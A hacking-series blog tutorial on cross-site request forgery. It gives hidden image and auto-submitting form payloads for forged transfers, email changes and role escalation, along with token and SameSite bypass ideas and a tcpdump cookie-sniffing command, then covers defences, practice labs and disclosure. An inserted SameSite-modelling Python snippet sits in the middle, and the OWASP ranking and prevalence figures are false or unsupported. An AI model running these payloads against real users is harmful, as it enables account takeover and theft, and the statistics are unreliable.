
Hey guys, Rocky here! 🎭🔐
Welcome to Day 5 of the Daily Web Hacking series! We’ve covered XSS, SQLi, and more. Today, we’re diving into Part 5: Cross-Site Request Forgery (CSRF)—the art of tricking users into unknowingly attacking themselves. Imagine convincing someone to sign a check they never saw. That’s CSRF in a nutshell. Let’s break it down!
—
What is CSRF?
Cross-Site Request Forgery (CSRF) forces a logged-in user to execute unwanted actions on a trusted site. By exploiting the browser’s automatic cookie-sending behavior, attackers can:
- Change account details (email, password).
- Transfer funds (banking apps).
- Post malicious content (social media).
- Hijack entire accounts.
Why it’s dangerous:
- #8 in the OWASP Top 10 (2021).
- Affects 1 in 5 web apps (OWASP, 2023).
- Silent and deadly—users have no clue it’s happening.
—
How CSRF Works: The Silent Puppeteer
Let’s say you’re logged into your bank. A hacker sends you a malicious link:
<img src="https://bank.com/transfer?to=hacker&amount=1000" width="0" height="0">
What happens:
- You click the link (or it loads in a hidden tab).
- Your browser sends your session cookie to bank.com.
- The bank thinks you authorized the transfer.
- $1,000 disappears.
Key Insight: Browsers automatically attach cookies to requests, even from malicious sites.
—
Types of CSRF
1. GET-Based CSRF
How: Triggered via <img>, <script>, or <iframe> tags.
Example:
<img src="https://social.com/delete-profile">
- Deletes your profile when the image loads.
2. POST-Based CSRF
How: Uses hidden forms to submit POST requests.
Example:
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="to" value="hacker">
<input type="hidden" name="amount" value="1000">
</form>
<script>document.forms[0].submit();</script>
3. JSON CSRF
How: Tricks servers into accepting JSON payloads via <form> or Flash.
Example:
<form action="https://api.site/update" enctype="text/plain" method="POST">
<input name='{"role":"admin","new":true}' value='}' type="hidden">
</form>
- Sends a valid JSON payload: {"role":"admin","new":true}.
—
Real-World CSRF Disasters
- Netflix (2006): Attackers used CSRF to alter DVD queues.
- Gmail (2007): CSRF flaw let attackers hijack email filters.
- YouTube (2008): CSRF allowed attackers to add/delete subscriptions.
Lesson: Even tech giants aren’t immune.
—
Step-by-Step CSRF Exploitation
Let’s hack a vulnerable email-change feature:
1. Identify the Target Action
- Find a sensitive endpoint (e.g., POST /change-email).
2. Craft the Malicious Request
Create a hidden form:
<form action="https://hacklivly.com/change-email" method="POST">
<input type="hidden" name="email" value="hacker@evil.com">
</form>
<script>document.forms[0].submit();</script>
3. Trick the User
- Send the payload via phishing emails, forums, or malicious ads.
4. Profit
- The user’s email is changed to hacker@evil.com.
- Reset their password via “Forgot Password.”
—
Bypassing CSRF Protections
1. CSRF Tokens
- What: Unique tokens per request.
- Bypass:
- Steal the token via XSS.
- Guess weak tokens (e.g., time-based).
2. SameSite Cookies
- What: Cookies marked SameSite=Lax aren’t sent cross-site.
- Bypass:
- Use GET requests (allowed in Lax mode).
- Exploit subdomain takeovers.
3. Referer/Origin Checks
- What: Servers check if requests come from their domain.
- Bypass:
- Use HTTPS → HTTP downgrades (Referer isn’t sent).
- Exploit browser quirks (e.g., data: URIs).
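To make the SameSite item above concrete, here is an added example (my own code, not from the post) that models the browser's cookie-attachment decision for the three delivery methods shown earlier: a hidden <img> subresource, a top-level link click, and an auto-submitted hidden form. The Set-Cookie header values are constructed samples, and the unset-attribute default of Lax follows Chromium's behaviour.

```python
from dataclasses import dataclass
from typing import Dict


@dataclass
class Cookie:
    name: str
    samesite: str   # "Strict", "Lax" or "None"
    secure: bool


def parse_set_cookie(header: str) -> Cookie:
    """Pull the SameSite and Secure attributes out of a Set-Cookie header value."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0]
    samesite, secure = "Lax", False          # Chromium treats an unset SameSite as Lax
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        if key.lower() == "samesite":
            samesite = val.strip().capitalize()
        elif key.lower() == "secure":
            secure = True
    return Cookie(name, samesite, secure)


def cookie_sent(cookie: Cookie, method: str, cross_site: bool, top_level_navigation: bool) -> bool:
    """Would a modern browser attach this cookie to the described request?"""
    if cookie.samesite == "None":
        return cookie.secure                   # SameSite=None is rejected unless Secure is set
    if not cross_site:
        return True                            # same-site requests always carry the cookie
    if cookie.samesite == "Strict":
        return False                           # Strict: never on a cross-site request
    # Lax: only safe-method, top-level navigations (a link click or a redirect),
    # so neither a hidden <img> subresource nor a cross-site POST gets the cookie.
    return top_level_navigation and method.upper() in ("GET", "HEAD", "OPTIONS")


def page_scenarios(set_cookie: str) -> Dict[str, bool]:
    """The three CSRF delivery methods from this post, evaluated against one cookie policy."""
    c = parse_set_cookie(set_cookie)
    return {
        "img_tag_get": cookie_sent(c, "GET", cross_site=True, top_level_navigation=False),
        "link_click_get": cookie_sent(c, "GET", cross_site=True, top_level_navigation=True),
        "hidden_form_post": cookie_sent(c, "POST", cross_site=True, top_level_navigation=True),
    }


if __name__ == "__main__":
    for policy in ("session=abc; Secure; SameSite=Lax", "session=abc; Secure; SameSite=None",
                   "session=abc; Secure; SameSite=Strict"):
        print(policy, "->", page_scenarios(policy))
```

The Lax row shows the caveat behind the "use GET" bypass: only a top-level navigation (link click) still carries the cookie, so any GET endpoint that changes state is the real weakness to hunt for in your own app.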
—
Defending Against CSRF
1. CSRF Tokens
Generate unique, random tokens per session.
Example (Django):
<form>
<input type="hidden" name="csrfmiddlewaretoken" value="R4nd0mStr1ng">
</form>
2. SameSite Cookies
- Mark session cookies SameSite=Lax (or Strict) so the browser withholds them on cross-site requests.
3. Double Submit Cookies
- Send the token in both the cookie and request body.
4. Custom Headers
- Require headers like X-Requested-With (blocks simple CSRF).
—
Advanced CSRF Tactics
1. Flash-Based CSRF
- Use Flash to send arbitrary headers (deprecated in 2020 but still relevant).
2. DNS Rebinding
- Bypass SameSite restrictions by rebinding DNS to the target’s IP.
3. XSS + CSRF = Supervillain Combo
- Steal CSRF tokens via XSS, then forge valid requests.
—
Tools for CSRF Testing
1. Burp Suite
- Generate CSRF PoC (Proof of Concept) from captured requests.
2. CSRFTester
- Open-source tool to test for CSRF vulnerabilities.
3. Postman
- Replay requests to check token validity.
—
Practice CSRF Legally
1. OWASP Juice Shop
2. PortSwigger Labs
—
Ethical Hacking & Reporting
Never exploit CSRF without permission. If you find a flaw:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
What’s Next? Part 6: Session Hijacking
Tomorrow, we’ll explore Session Hijacking—stealing cookies, exploiting JWT tokens, and taking over accounts. Sneak peek:
# Sniffing cookies with tcpdump
tcpdump -i eth0 'port 80' | grep 'Cookie:'
—
Final Thoughts
CSRF is a masterclass in deception—exploiting trust between users and sites. But with defenses like CSRF tokens and SameSite cookies, we can shut it down. Stay curious, stay ethical, and keep breaking things (responsibly)!
Rocky signing off! ✌️
—
P.S. If you’re enjoying this series, share it with your network! Let’s turn newbies into security ninjas.
Discussion Question: What’s the sneakiest CSRF attack you’ve seen? I once saw a CSRF worm that auto-liked a post for every visitor. 😂 Spill your stories below! 👇